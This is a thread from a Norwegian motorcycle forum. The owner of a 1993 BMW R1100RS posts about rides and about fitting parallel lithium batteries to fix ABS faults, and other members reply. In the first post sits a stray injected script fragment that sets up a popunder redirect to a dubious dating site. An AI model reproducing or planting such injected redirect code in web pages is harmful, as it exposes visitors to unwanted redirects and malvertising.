Gammelferskingens eskapader med Bimbo.

Din egen Forum-blogg! Om MC-livet ditt og annet du vil dele med andre.
Svar
Brukeravatar
SveinHa
Innlegg: 374
Registrert: 09 mai 2023, 23:46
Motorsykkelen din: BMW R1100RS 1993
Sted: Carten Island
Kontakt:

Re: Gammelferskingens eskapader med Bimbo.

Legg inn av SveinHa »

Solen brydde seg ikke om værmeldingen i dag så da ble det en impulstur rundtom på holmen min...
Screenshot_20240223-165524.png
Nå er ikke vi noe plaget med oversvømmelser og slikt så dette her er vel i nærheten av det verste vi kan oppleve:
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}

Der var nok et godt stykke igjen til Bimbo ble vannkjølt...
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.
Litt om meg og mitt (der er fremdeles noen som er så gamle at de har hjemmeside i stedet for alskens usosiale medier): http://www.sveinha.com/

Mine kjøretøy pr i dag: "NittiNitti": -90 Land Rover 90, "Bimbo": -93 BMW R1100RS, "Helmut": -08 Knaus Sunliner 808

Brukeravatar
Gammelsmurfen
Innlegg: 1297
Registrert: 09 nov 2020, 19:05
Motorsykkelen din: BMW F850GS Rally 2022

Re: Gammelferskingens eskapader med Bimbo.

Legg inn av Gammelsmurfen »

Jaja, bar bakke og "grønn" plen, det er noen som har det :-)
Selv om det er mildvær og av og på med regn og yr i Oslo og omegn, så er det mengder med snø.
Det har vært noen mildværsperioder og regn gjentatte ganger i vinter, også beinkaldt igjen så den snøen er robust mot sånt vær nå.
Det er vel isete tvers igjennom rundt 80cm tenker jeg (bor på 250 moh).

Gleder meg ekstremt til sesongstart, men det er alt for mange uker til at jeg vil tenke for mye på det enda...

Brukeravatar
SveinHa
Innlegg: 374
Registrert: 09 mai 2023, 23:46
Motorsykkelen din: BMW R1100RS 1993
Sted: Carten Island
Kontakt:

Re: Gammelferskingens eskapader med Bimbo.

Legg inn av SveinHa »

Bimbo har "bursdag" 🎉
IMG_20240320_141517_127.jpg
Ble feiret med en kombinert sightseeing og sjåppetur.
Screenshot_20240320-145818.png
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.
Litt om meg og mitt (der er fremdeles noen som er så gamle at de har hjemmeside i stedet for alskens usosiale medier): http://www.sveinha.com/

Mine kjøretøy pr i dag: "NittiNitti": -90 Land Rover 90, "Bimbo": -93 BMW R1100RS, "Helmut": -08 Knaus Sunliner 808

Brukeravatar
AJ
Administrator
Innlegg: 37883
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: Gammelferskingens eskapader med Bimbo.

Legg inn av AJ »

Gratulerer :twothumbs: !

Selv er jeg sånn ca. 23000 km. unna samme milepæl på min 2018 mod. KTM 1290 SA S.
Så får vi se om jeg fortsatt eier denne når 100K nås... ;)
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Brukeravatar
SveinHa
Innlegg: 374
Registrert: 09 mai 2023, 23:46
Motorsykkelen din: BMW R1100RS 1993
Sted: Carten Island
Kontakt:

Re: Gammelferskingens eskapader med Bimbo.

Legg inn av SveinHa »

Ute og lufta vettet med poden i dag. Ikke helt sommer enda så måtte ha en fingervarmestopp etter 4 mil...
Skjermbilde fra 2024-03-25 19-53-21.png
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.
Litt om meg og mitt (der er fremdeles noen som er så gamle at de har hjemmeside i stedet for alskens usosiale medier): http://www.sveinha.com/

Mine kjøretøy pr i dag: "NittiNitti": -90 Land Rover 90, "Bimbo": -93 BMW R1100RS, "Helmut": -08 Knaus Sunliner 808

Brukeravatar
SveinHa
Innlegg: 374
Registrert: 09 mai 2023, 23:46
Motorsykkelen din: BMW R1100RS 1993
Sted: Carten Island
Kontakt:

Re: Gammelferskingens eskapader med Bimbo.

Legg inn av SveinHa »

Så var poden levert på kjøreskolen med "L" på ryggen og kom tilbake med A1 i lomma... Rundt 7000 km i tillegg til kjøretimene har gjort sitt...

Jeg benyttet godværet til en liten tur i ventetiden...
Screenshot_20240424-133856.png
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.
Litt om meg og mitt (der er fremdeles noen som er så gamle at de har hjemmeside i stedet for alskens usosiale medier): http://www.sveinha.com/

Mine kjøretøy pr i dag: "NittiNitti": -90 Land Rover 90, "Bimbo": -93 BMW R1100RS, "Helmut": -08 Knaus Sunliner 808

Brukeravatar
SveinHa
Innlegg: 374
Registrert: 09 mai 2023, 23:46
Motorsykkelen din: BMW R1100RS 1993
Sted: Carten Island
Kontakt:

Re: Gammelferskingens eskapader med Bimbo.

Legg inn av SveinHa »

Til tross for en del skepsis gitt uttrykk for i annen tråd så kjøpte jeg meg 2 stk 5 Ah Lithiumbatteri på Biltema (80176). Disse batteriene har en CCA på 290A, en max ladestrøm på 20A og max ladespenning på 14.4V +- 0.5V. De gangene jeg har målt ladespenning på Bimbo har den ligget på akkurat 14.0V. Med en max ladestrøm på til sammen 40A regner jeg med de maksimale 50A fra dynamoen ikke skal utgjøre noe problem.

Bommet litt når jeg målte batteriboksen uten å ta av tanken så det ble litt i overkant trangt å få plassert de 2 batteriene men det gikk nå på et vis ved å fjerne bakkanten av batteriboksen.... Parallellkobling ble også litt trangt men det gikk nå ganske akseptabelt til slutt...

Erfaringen etter en mnd er at ABS ikke har feilet en eneste gang så suksess så langt. Har ikke merket at der er nevneverdig mer futt i startmotoren.

Vedr. blybatteri så hadde det installerte batteriet en CCA på 170A og når jeg søker på nett etter batteri til BMW R1100RS så dukker der opp en haug med batterier med CCA 170A men også noen med opptil CCA 420A og det er tydelig at CCA 170A er for lite for ABS modulen på denne typen sykkel. Jeg leser jo også på nett at "die hard" BMW folk kun kjøper originalbatteri og ikke har ABS problemer. Selv om det ikke står direkte så er jeg ganske sikker på at originalbatteri har langt høyere CCA enn 170A... I Clymer manualen står der ikke spesifisert CCA men i alle fall er der bilde av 2 forskjellige batteri merket 170A.
Litt om meg og mitt (der er fremdeles noen som er så gamle at de har hjemmeside i stedet for alskens usosiale medier): http://www.sveinha.com/

Mine kjøretøy pr i dag: "NittiNitti": -90 Land Rover 90, "Bimbo": -93 BMW R1100RS, "Helmut": -08 Knaus Sunliner 808

Svar